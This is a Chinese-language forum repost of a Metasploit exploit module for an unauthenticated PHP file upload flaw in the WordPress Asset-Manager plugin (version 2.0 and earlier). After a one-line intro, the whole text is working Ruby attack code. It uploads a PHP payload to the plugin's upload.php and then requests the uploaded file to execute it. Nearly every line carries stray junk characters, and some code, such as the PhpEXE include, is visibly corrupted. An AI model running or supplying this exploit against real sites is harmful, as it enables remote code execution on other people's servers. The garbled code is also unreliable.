这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。* Z5 N. l& d) L* N b& @
6 v h( s$ @% S) d' c" `( D##/ E) {4 ], n8 Y! V, F
# This file is part of the Metasploit Framework and may be subject to: Y/ t/ _ `) h+ I" W: v
# redistribution and commercial restrictions. Please see the Metasploit
! m+ _6 p+ T. ?- T% T {# b# Framework web site for more information on licensing and terms of use.
- M! X8 d0 T$ ]3 n& Y g) h# http://metasploit.com/framework/
* S+ G* X/ h, h: T7 W/ n##
, N* o: v# R! B8 G$ o4 Q " f1 r! b% E5 u/ A3 q1 M8 Y
require 'msf/core'
: d2 V9 H, y( Z" l {require 'msf/core/exploit/php_exe'
$ N) Y/ P( U" ?9 J3 g O. i
" L' l: [6 ~! J/ t- D qclass Metasploit3 < Msf::Exploit::Remote
7 N# C, ^5 J+ m4 _( a: ^$ r; ? Rank = ExcellentRanking
! @2 z9 X4 ~# ]. d& R ) _! y1 J/ P! P# @9 ?: Z* j9 ?
include Msf::Exploit::Remote::HttpClient
! a/ c" \! k$ }. N7 _2 k1 E$ A/ | include Msf::Exploit: hpEXE
: j: ]' ]( `5 {, m7 | E( |
) U1 S; u9 U; F0 Y def initialize(info = {})
* [# ]- V3 e- [+ u) `1 F super(update_info(info,
5 ~8 G* R- w t- {# _ 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
: y A v# [( F. p0 `* I 'Description' => %q{' A$ R: k2 _; G. }3 z
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
1 j5 s: V K- V8 Z4 N$ X plugin. By abusing the upload.php file, a malicious user can upload a file to a% r: a! e4 o0 m6 W; J/ m5 m9 I5 V
temp directory without authentication, which results in arbitrary code execution.
7 J* b# b2 w% S8 K },! C3 `. T* J3 H, N% f% A
'Author' =>+ q8 T( s: K" g) N2 T
[
% i4 ~- C7 w. M, g' s: B3 X/ p 'Sammy FORGIT', # initial discovery' s8 [: G9 Q5 d" G/ P! Z. t
'James Fitts <fitts.james[at]gmail.com>' # metasploit module5 t$ K5 s# g' z. x5 t" j1 \
],
/ s- }$ \4 [6 W% g, V 'License' => MSF_LICENSE,
0 {" U4 L, j, W: K e 'References' =>4 E2 q6 Q: i6 E* Y7 r- x9 q& x
[0 Y; A0 ~# H b! b" C- z
[ 'OSVDB', '82653' ],& s+ H& h; r1 X% n) y8 \
[ 'BID', '53809' ],: |8 N4 W; }9 H% u
[ 'EDB', '18993' ],
; S1 A% L, V& P2 ^: S [ 'URL', 'http:// www.myhack58.com /' ]" t. V J" K- q- ? A5 L' a. V
],
0 J7 k/ _& u2 n$ T! i2 D, K4 m 'Payload' =>/ @$ A- D1 L: r" Y/ e! w' z7 z! w+ d
{
: F# V" \" J* p. K# s 'BadChars' => "\x00",% c- i3 c' N) a* X5 E. B: I% a! b
},
0 P. g; f% a& \) H# n 'Platform' => 'php',
# ~0 ?& |% {1 | 'Arch' => ARCH_PHP,
8 s+ ] `9 a1 H 'Targets' =>
+ @2 z! \4 s6 \$ O: I d" a [
: E. |; J8 |$ D4 T! L, @% z% {" ^ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
( @9 e) M' D& Q9 f [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
# Z& ^0 a4 T* I3 g ],$ _/ a- c! [; E: f. W# S
'DefaultTarget' => 0,( Z+ V: N$ A" v$ r
'DisclosureDate' => 'May 26 2012'))
3 @7 K. f: G, u! m# i' T, t! C9 d
7 a" y7 a" W3 x" j: C register_options(
$ D, b N3 C$ A; l6 b: j; V [
3 K, Y, q5 Y2 }5 q& L OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; C b% O3 {7 t0 N3 T# v. L: b ], self.class)
9 p. a B" s# V$ Z end% B3 n4 `' r$ k5 {
: m0 T* k# f0 T: D8 K# ?3 u
def exploit C% c; l8 m3 s
uri = target_uri.path, I8 j9 ?% E6 n& \' `
uri << '/' if uri[-1,1] != '/'4 I6 U* ]' ^" @( z
peer = "#{rhost}:#{rport}"
# Y$ l6 L, ]2 j6 x# w3 z E$ i payload_name = "#{rand_text_alpha(5)}.php"6 F( ], Y; p9 ?7 U% p" A
php_payload = get_write_exec_payload(:unlink_self=>true)2 p8 K- E# b, E( \- z; j
2 d/ M* e0 c& T7 e7 ]( H) w
data = Rex::MIME::Message.new
; |3 w* |( s8 ]9 A. d+ K0 X4 Z1 D9 f data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
" E% H. \3 b* K0 v0 Z# s post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
/ f1 J J. N$ E" s; [# ?# C3 W
# ^) R$ |! C* s! H! w print_status("#{peer} - Uploading payload #{payload_name}"), L5 e: v9 P$ n/ t5 q4 @/ d
res = send_request_cgi({; D! c% n! L4 N7 U. S- s
'method' => 'POST',
2 G. c# t2 [; M, V m 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",; q0 K* ?" C6 s
'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ _. K4 B* d/ V5 L 'data' => post_data
; D5 L6 C0 R0 k! g' U0 P })# T/ K6 _1 R6 K
- c0 Q/ w( r0 Y7 ~ if not res or res.code != 200 or res.body !~ /#{payload_name}/
3 |" b3 x- a3 {& T fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ I" z+ o( A1 jend; y8 a; d0 U& O3 Z4 \* @/ N
' ~3 ^$ p( D6 L$ [6 n' p7 W8 d$ R% s* Q
print_status("#{peer} - Executing payload #{payload_name}")
) }4 m: p4 N0 J res = send_request_raw({5 L0 t- l8 d/ k& W) o4 o" Y; g" D0 q c
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
b \! g" f# N0 M- E 'method' => 'GET'
' f% ^+ H/ i5 h: q$ n+ a, S })6 t) q% H$ ?( h
6 y4 S6 L+ q# F# v$ _* q4 D
if res and res.code != 200
. Q% b. V4 R, q& W9 U fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
5 N5 a+ X/ [6 m e2 R g$ t/ P end
$ N: l( ?* F, M/ g: K end
8 k# q0 a9 Z) ?end4 B6 k2 l9 B7 ?' t0 y* l& a- L- l
|